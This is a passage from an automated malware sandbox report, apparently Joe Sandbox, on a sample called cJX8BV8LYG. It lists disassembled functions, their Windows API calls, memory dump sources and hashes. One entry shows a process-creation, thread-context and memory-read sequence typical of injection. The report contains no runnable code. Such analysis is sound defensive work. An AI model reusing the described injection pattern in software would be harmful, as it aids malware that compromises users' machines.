                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_
                                    • String ID:
                                    • API String ID: 1144537725-0
                                    • Opcode ID: 19fd00ef275ca52a8f5329be7a2f2f0530c94e7b51e27646557ae51736bba7c8
                                    • Instruction ID: 68f8d6aff6007c6643f02d9847e03100b19a018e414a11935c710482921c5ee3
                                    • Opcode Fuzzy Hash: 19fd00ef275ca52a8f5329be7a2f2f0530c94e7b51e27646557ae51736bba7c8
                                    • Instruction Fuzzy Hash: 7E318E70644701DFD720EF28D899BD7BBE8FB49709F00092EF99983250E779AA44CB52
                                    Function 0078B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0078BB4E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID:
                                    • API String ID: 1385522511-0
                                    • Opcode ID: 5e2bf49083eec8f324a0ca6edef8ad776810ff67e75496d857fb47be1d0bd5c3
                                    • Instruction ID: 6f65e029706a550975ac3baeaae1f00da6608d24f765b60e5ad5574735dee428
                                    • Opcode Fuzzy Hash: 5e2bf49083eec8f324a0ca6edef8ad776810ff67e75496d857fb47be1d0bd5c3
                                    • Instruction Fuzzy Hash: 97329874A40209DFDB24EF54C898BBEB7B9FB45310F18805AE905AB361D77CAD81CB91
                                    Function 01E4129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01E41A5B
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E41AF1
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E41B13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                    • Instruction ID: 8df4d2fa04d0cbd9298f5866aaeabcb4f98fa7375f459361a2ae3a446e7b6973
                                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                    • Instruction Fuzzy Hash: CF12CE24E14658C6EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A5F81CB5A
                                    Function 00784ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00784E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00784EDD,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E9C
                                      • Part of subcall function 00784E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00784EAE
                                      • Part of subcall function 00784E90: FreeLibrary.KERNEL32(00000000,?,?,00784EDD,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784EC0
                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784EFD
                                      • Part of subcall function 00784E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,007C3CDE,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E62
                                      • Part of subcall function 00784E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00784E74
                                      • Part of subcall function 00784E59: FreeLibrary.KERNEL32(00000000,?,?,007C3CDE,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784E87
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Library$Load$AddressFreeProc
                                    • String ID:
                                    • API String ID: 2632591731-0
                                    • Opcode ID: ecd8f578b12022336ef431d4c5649e927c8d7c70bcc96669b3fd5e44e1cd9ecb
                                    • Instruction ID: 6c8b4983fb4438c2dca0a1dd29ef903d75604ef6d494188d63722dc2fe602d54
                                    • Opcode Fuzzy Hash: ecd8f578b12022336ef431d4c5649e927c8d7c70bcc96669b3fd5e44e1cd9ecb
                                    • Instruction Fuzzy Hash: D411E332680206EACB24BF60DC0AFAD77A5AF50714F10842EF642E61C1EEB89A459750
                                    Function 007B8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: __wsopen_s
                                    • String ID:
                                    • API String ID: 3347428461-0
                                    • Opcode ID: 1a0c6c2ea0193c60d964adf59470325d07830223af05d36ac85b8b3ea00208fe
                                    • Instruction ID: b8fc2efad14384001d12aac3aa4f1467f8cd929b741375b0b8d61070e0f3ac57
                                    • Opcode Fuzzy Hash: 1a0c6c2ea0193c60d964adf59470325d07830223af05d36ac85b8b3ea00208fe
                                    • Instruction Fuzzy Hash: D511187590420AEFCF05DF58E945ADA7BF9EF48314F104059FC08AB312DA35EA15CBA5
                                    Function 007B5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007B4C7D: RtlAllocateHeap.NTDLL(00000008,00781129,00000000,?,007B2E29,00000001,00000364,?,?,?,007AF2DE,007B3863,00851444,?,0079FDF5,?), ref: 007B4CBE
                                    • _free.LIBCMT ref: 007B506C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                    • Instruction ID: 793e4fe095d2a6cfc7dce296d362014094106de55adfff95eb6ce9c8f7769386
                                    • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                    • Instruction Fuzzy Hash: 8E014972204705ABE3319F65D885BDAFBECFB89370F25061DE184932C0EA34A805C7B4
                                    Function 007AE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                    • Instruction ID: 93d2873df8c22f06f82c3dd37f0fde5823a5955362d22cac4482d52842a62d02
                                    • Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                    • Instruction Fuzzy Hash: 4BF0F432511A10EAD6313A698C0DB9A339C9FD3334F100B25F525921D2DB7CE8028AA6
                                    Function 00789CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID:
                                    • API String ID: 176396367-0
                                    • Opcode ID: a1aab6b1abdf35b971cbb30c4e90fbef234579797177db4f7ef5b95bc5723019
                                    • Instruction ID: c327a889b176afe1034a03905bcc77f0b0ab32e2ca6d9b1967f39e12ce3a1322
                                    • Opcode Fuzzy Hash: a1aab6b1abdf35b971cbb30c4e90fbef234579797177db4f7ef5b95bc5723019
                                    • Instruction Fuzzy Hash: 49F0C8B3640600BED714AF38D80AA67BB98EB84760F14862AF619CB1D1DB75E51087E4
                                    Function 007B4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,00781129,00000000,?,007B2E29,00000001,00000364,?,?,?,007AF2DE,007B3863,00851444,?,0079FDF5,?), ref: 007B4CBE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 8a72e1fd5eeb5cee31e2cfa5bd1d75bff76d31701d6f1a48ca3151b31ad37dea
                                    • Instruction ID: 9dfc905487685fbbdb49c40aead266f1fe21df8a0d810ad9bce7e877f21f88a1
                                    • Opcode Fuzzy Hash: 8a72e1fd5eeb5cee31e2cfa5bd1d75bff76d31701d6f1a48ca3151b31ad37dea
                                    • Instruction Fuzzy Hash: 3DF0B432646224A6DB215F629C09BDA3F88BF81FA1B145221F819E6283DA7DDC0046F0
                                    Function 007B3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6,?,00781129), ref: 007B3852
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 4991a778178ee350a1a02d2aa410007a039a858890f7d7c6f3e84efdcc2d1ba9
                                    • Instruction ID: 140bf611b8d256a4d72cbb645018b46c1f62fcf13a4373c645ca042c539e5ca5
                                    • Opcode Fuzzy Hash: 4991a778178ee350a1a02d2aa410007a039a858890f7d7c6f3e84efdcc2d1ba9
                                    • Instruction Fuzzy Hash: 53E06532141224AAE72126AA9C09BDA3649BF827B1F160132BC15D6591DB5DDD8181F2
                                    Function 007B4D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 007B4D9C
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorFreeHeapLast_free
                                    • String ID:
                                    • API String ID: 1353095263-0
                                    • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                    • Instruction ID: d13cecc913d2cc926a0e4e67ca951ee0edb0509c0c80aff29b3468503e124169
                                    • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                    • Instruction Fuzzy Hash: 67E06D36201205AF8720CE6CD400AC2B7F4EF843207208929F99DD3221D331E812CB80
                                    Function 00784F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    • FreeLibrary.KERNEL32(?,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784F6D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 85d78b2dc6a3c6dc3854ac5edcbba2d2e945554f4febaf3d8feb2dd291754fe7
                                    • Instruction ID: 43a6a5dc3948bd73570899780234f3fef838f0b8e12de4fda3460462bb8263a2
                                    • Opcode Fuzzy Hash: 85d78b2dc6a3c6dc3854ac5edcbba2d2e945554f4febaf3d8feb2dd291754fe7
                                    • Instruction Fuzzy Hash: CEF03971185752DFDB34AF64D494822BBE4BF143293298A7EE2EA82621C7B99844DF10
                                    Function 00782DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00782DC4
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LongNamePath_wcslen
                                    • String ID:
                                    • API String ID: 541455249-0
                                    • Opcode ID: 7a11a4ccf55db1f7082f354473589ef0f45316dc4e2db054969242b2b9c87a53
                                    • Instruction ID: 7c55568eea49f25517a11029ef61db046a3315f96b1bdf2977f6bf38cbec0bbb
                                    • Opcode Fuzzy Hash: 7a11a4ccf55db1f7082f354473589ef0f45316dc4e2db054969242b2b9c87a53
                                    • Instruction Fuzzy Hash: 59E0CD726002245BC710A2589C09FDA77DDDFC8790F044075FD09D7248DA74ED808650
                                    Function 007F2693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                    • Instruction ID: a3c427b754884b08a80f92b86c1bd0bc95bc3691ba45e35b7574f08db2427a1d
                                    • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                    • Instruction Fuzzy Hash: AEE04FB0609B009FDF395A28A8517B677E89F4A300F00086EF69BC2753E57668468A4D
                                    Function 00782B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00783837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00783908
                                      • Part of subcall function 0078D730: GetInputState.USER32 ref: 0078D807
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00782B6B
                                      • Part of subcall function 007830F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0078314E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                    • String ID:
                                    • API String ID: 3667716007-0
                                    • Opcode ID: 65ac6fca95d678915477a0d9095d2830c7e2f0f4741cc05194463765654ad000
                                    • Instruction ID: 70dbd1a3a14be2462259cb4264583e4419cffd5c1b4297393aba167d6f511262
                                    • Opcode Fuzzy Hash: 65ac6fca95d678915477a0d9095d2830c7e2f0f4741cc05194463765654ad000
                                    • Instruction Fuzzy Hash: DBE0862138424486CA04BB78A85E5BDE75AABD1756F40153EF542871A3DE2D49494362
                                    Function 007C039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,00000000,?,007C0704,?,?,00000000,?,007C0704,00000000,0000000C), ref: 007C03B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: fdaaa30225f41ea6388f2ce9044703ff18541944c1b8b3c1e3a2e693e2b4d864
                                    • Instruction ID: 9dc06771c23ebd250227153eda3c64cdbd1e06d2324642f76bb3d3d639122f42
                                    • Opcode Fuzzy Hash: fdaaa30225f41ea6388f2ce9044703ff18541944c1b8b3c1e3a2e693e2b4d864
                                    • Instruction Fuzzy Hash: B3D06C3208010DBBDF028F84DD06EDA3BAAFB48714F018000BE1856020C732E821AB90
                                    Function 00781CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00781CBC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem
                                    • String ID:
                                    • API String ID: 3098949447-0
                                    • Opcode ID: e662abfba1c46d715680271fe62f6f049c4a595b865f92e76f46483eb8053551
                                    • Instruction ID: ba9fd918a3a1ee24f1f0efa8cf12503ca89145963ed76ea455b04207c90883d1
                                    • Opcode Fuzzy Hash: e662abfba1c46d715680271fe62f6f049c4a595b865f92e76f46483eb8053551
                                    • Instruction Fuzzy Hash: 04C092362C0304AFF6158B80BC5EF90776AB748B02F048401F609A96F3D7AA2820EA50
                                    Function 0079FC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: b50a73eebcabff6fa5980cc8c3c983ff4939ef0b50101766e3d8035fae5b8d55
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: FD31D275A00109DBCB18DF69E490969FBA6FF4A300B24C6A5E809CB656D735EDC1CBD0
                                    Function 01E4229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 01E422B1
                                    Memory Dump Source
